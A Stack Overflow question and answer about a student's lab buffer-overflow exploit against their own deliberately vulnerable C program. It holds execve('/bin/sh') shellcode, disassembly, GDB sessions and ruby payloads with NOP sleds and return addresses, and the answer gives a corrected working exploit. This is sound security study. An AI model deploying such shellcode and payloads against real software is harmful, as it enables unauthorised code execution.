Reputation: 151
Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve()
to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawn a shell and then exits. Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of a objdump -d -M intel of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:
execve()
happens.The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*func)();
func = (void (*)()) shellcode;
(void)(func)();
}
What's wrong with my shellcode?
EDIT 1:
Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.
Therefore, you shellcode run alright as a standalone program is not a proof that it works.
The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: Why the exploit works inside GDB but does not outside it?
Upvotes: 4
Views: 4082
Reputation: 58762
The problem is the mov al,0x3b
. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve
syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax
before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al
just after you have cleared eax
.
The full exploit could look like:
ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
The initial part corresponds to:
jmp short push_shell
starter:
pop rdi
xor eax, eax
mov [rdi + 7], al
mov al, 59
Note that due to the code size change, the offset for the jmp
and the call
at the end had to be changed as well, and the number of nop
instructions too.
The above code (with the return address adjusted for my system) works fine here.
Upvotes: 3